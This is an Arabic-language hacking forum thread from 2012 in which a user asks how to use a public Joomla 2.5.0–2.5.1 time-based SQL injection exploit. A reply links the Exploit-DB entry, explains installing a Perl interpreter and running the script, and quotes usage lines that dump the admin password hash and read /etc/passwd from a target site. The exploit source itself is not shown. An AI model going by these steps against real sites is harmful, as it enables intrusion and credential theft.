التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 03-19-2012, 08:08 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
غير مسجل
زائـــر
 
الصورة الرمزية غير مسجل
 

 

 
إحصائية العضو




 

 

.... مجاب: شرح ثغره


السلام عليكم

مطلوب شرح الثغره الجديده
Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit




Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC avp eyvi

   

رد مع اقتباس
أفضل جواب - كتبه معاني الفراق
التغره بلغه البيرل
استخدم مترجم بيرل
قديم 03-20-2012, 12:56 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو





معاني الفراق غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
معاني الفراق is on a distinguished road

افتراضي رد: شرح ثغره


التغره بلغه البيرل
استخدم مترجم بيرل

التوقيع

aa.2232@hotmail.com

 

   

رد مع اقتباس
قديم 03-20-2012, 06:13 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي رد: شرح ثغره


وعليكم السلام ورحمه الله وبركاته.

هذه هي الثغرة لم تقم بوضع رابطها :

http://www.exploit-db.com/exploits/18618/

اقتباس
#!/usr/bin/perl

كما تلاحظ الثغرة مكتوبة بلغة البيرل تحتاج لمترجم البيرل بجهازك لكي تستطيع إستثمار الثغرة.

لتحميل مترجم البيرل من موقعه الرسمي :

http://www.activestate.com/activeperl/downloads

بعد ذلك تذهب إلى شاشة الدوس وتذهب لمسار الملف وتنفذ الأمر ك

perl 18618.pl

سوف يأتيك الشرح لكيفية التشغيل :

examples:
get admin password:
18618.pl http://host/joomla/ 3 'database()'
18618.pl http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema="joomla" and table_name like "%25_users"'
18618.pl http://host/joomla/ 3 'select password from zzzz_users limit 1'
get file /etc/passwd
18618.pl http://host/joomla/ 3 'load_file("/etc/passwd")'


الثغرة ليست بتلك الخطورة ,
التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 04:36 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0